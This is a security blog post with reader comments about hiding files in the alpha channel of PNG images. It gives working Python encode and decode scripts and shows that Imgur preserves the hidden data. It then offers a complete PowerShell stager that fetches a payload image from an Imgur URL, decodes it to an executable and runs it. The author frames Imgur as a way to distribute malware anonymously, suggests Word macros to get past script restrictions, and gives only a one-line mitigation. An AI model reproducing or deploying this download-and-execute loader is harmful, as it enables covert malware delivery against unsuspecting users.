This isn't very stealth and there are ways to do this better.
Encoding a file within a PNG
First, it helps to understand a PNG file. Unlike JPEG, PNG is lossless even though it is compressed, meaning that when you create an image in the format, it retains the data that it has been generated until the resolution or colour pallette is modified. Unlike a GIF, a PNG file handles transparency through an alpha channel instead of colour substitution.
It's this compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit values for transparency level (referred to as an "alpha channel"). This means that each pixel would be presented as R, G, B, and A with values from 0-255 on each.
Here's a sample image (sourced via Wikipedia) with what I am talking about:
This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels, or 468 KB of data that we can place within. Let's use Pillow and Python to mess with this.
Using the above script is relatively straightforward:
from PIL import Image from sys import argv from base64 import b64encode i = argv[1] o = argv[2] with open(argv[3], 'rb') as f: text = f.read() img_in = Image.open(i) img_pad = img_in.size[0] * img_in.size[1] text = b64encode(text) if len(text) < img_pad: text = text + '\x00'*(img_pad - len(text)) else: print('File is too large to embed into the image.') quit() text = [text[i:i+img_in.size[1]] for i in range(0, len(text), img_in.size[1])] img_size = img_in.size img_mode = img_in.mode img_o = Image.new(img_mode, img_size) for ih, tblock in zip(xrange(img_in.size[0]), text): for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]): x, y, z, a = img_in.getpixel((ih, iv)) pixels = (x, y, z, an) img_o.putpixel((ih, iv), pixels) img_o.save(o)
Executing it is as follows:
$ python encode.py image.png image_out.png payload.dat
When it runs, it ensures that the payload is not larger than the image can handle then encodes it using Base64 then pads it with null bytes until it reaches the size of the total number of pixels. Then the process of replacing each alpha channel value with the value of the character in the encoded data is done and then saved to disk.
Let's embed an image into an image shall we!
Inside of this image I've encoded a JPEG within it. The image has obviously changed towards a bit of a softer look with some jankiness in the transparency but you'd normally never think of it being suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.
For the curious, this is the image that was embedded within:
This Python script can retrieve the data out of the image:
from PIL import Image from sys import argv from base64 import b64decode i = argv[1] o = '' s = argv[2] img = Image.open(i) for x in xrange(img.size[0]): for y in xrange(img.size[1]): p = img.getpixel((x, y)) p = p[-1] o = o + chr(p) o = o.replace('\000', '') o = b64decode(o) with open(s, 'wb') as f: f.write(o)
We can confirm that nothing is lost by running these commands:
$ md5 blog_sample.png MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b $ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg $ md5 blog_sample.out.png MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39 $ md5 antivirus.jpg MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b $ python decoder.py blog_sample.out.png antivirus.orig.jpg $ md5 antivirus.orig.jpg MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b
As you can see the file contents do not change by the embedding of data within the image's alpha channel.
Let's use Imgur and Powershell to abuse this
Since its debut on Reddit, Imgur has become one of the largest image hosting services. This is largely due to its ease of access in uploading images without requiring anyone to create an account.
In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use a old technique where you combine a zip file with a JPEG or PNG on their service as it appears to outright strip the data.
Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encode as demonstrated earlier. Let's try uploading the sample image from earlier and check.
$ md5 blog_sample.out.png MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39 $ wget https://i.imgur.com/Oj8FhU5.png --2016-11-24 13:56:50-- https://i.imgur.com/Oj8FhU5.png Resolving i.imgur.com... 151.101.52.193 Connecting to i.imgur.com|151.101.52.193|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 664208 (649K) [image/png] Saving to: 'Oj8FhU5.png' Oj8FhU5.png 100%[====================================>] 648.64K 2.42MB/s in 0.3s 2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208] $ md5 Oj8FhU5.png MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
As we can see here, the file from earlier was uploaded to Imgur has not been altered.
So where do we go from here? How is this useful? Well to start, the thing that Imgur is great for is that you do not need to sign up with an account to upload an image. Why not use it to distribute malware without having to provide too many details?
One thing to be concerned about is that you have to have the ability to retrieve the PNG image and then process it as while there have been code execution issues with PNG libraries in the past, for the most part just loading a payloaded-image is unlikely to result in compromise.
Fortunately, Windows has built-in functions that straight up let you work with an image and extract the pixel data. This can be achieved using Powershell without any additional modules. The code is as follows:
The script works as follows:Add-Type -AssemblyName System.Drawing Add-Type -AssemblyName System.Text.Encoding $strURL = "http://i.imgur.com/nckqSN1.png" $strFilename = "c:\temp\payloadb64.png" $peOutputFile = "c:\temp\calc.exe" Invoke-WebRequest -Uri $strURL -OutFile $strFilename $image = [System.Drawing.Image]::FromFile($strFilename) $peBase64 = @() for ($w=0;$w -lt $image.Width;$w++) { $row = @() for ($h=0;$h -lt $image.Height;$h++) { $pixel = ($image.GetPixel($w,$h)).A $pixel = [convert]::toint32($pixel, 10) $pixel = [char]$pixel $row += $pixel } $peBase64 = $peBase64 + $row } $peImage = @() foreach ($peValue in $peBase64) { if ($peValue -ne "`0") { $peImage = $peImage += $peValue } } $peImage = [System.Convert]::FromBase64String($peImage) [System.IO.File]::WriteAllBytes($peOutputFile, $peImage) & $peOutputFile
- Download a PNG from Imgur and save it to disk
- Using System.Drawing, read every pixel and extract the alpha (A) value
- Ensure that all null values (0x00) are stripped from the array
- Decode Base64 and write file to disk
- Run the newly decoded file as an executable
Executing the above code does require that your system's policy to allow the execution of Powershell scripts. That said, while on most home computers this is not an issue as it is disabled by default, many enterprise environments require this to be on. A way around any restrictions could be to execute the code with the help of VBScript and perhaps storing all of this within a Word macro.
Mitigation
One thing to keep in mind is that while the attack was done using Powershell, it doesn't mean that you couldn't achieve this with a Word document with an embedded macro. Avoiding executing any unwanted code is really the best way to go about avoiding this from an enduser perspective.
Imgur's response
Imgur did get back to me stating that while informative there isn't an immediate need to fix the issue due to the impact it presents.
Last Remark
I want to make it clear here that what I am showing with embedding data through a stenographic process is far from new, as it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice and there are many guides out there to read and software suites to use.
Also, yesterday, PortSwigger posted an article on doing something similar using JPEG files that was rather interesting.
Great article, thanks for posting!
ReplyDeleteI'm a little confused. How does the malicious code embedded in the image get extracted on the victims machine? It looks like you had to deliberately run a specific power shell script to do so, which a victim wouldn't know to do.
ReplyDeleteI assumed that in this case the victim has already been infected, and an image hosting site would be used as an anonymous code repository. Victim silently checks in once a day or whatever.
DeleteThere was a botnet recently that was doing something like this. They hid the malware in a .png image, and published it to an advertising network, along with the accompanying javascript. If the victim met a set of criteria, the malware was extracted from the image via javascript, and an exploit kit was used to execute it. In this case the malware was using CSRF to change settings on routers.
Deletehttps://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices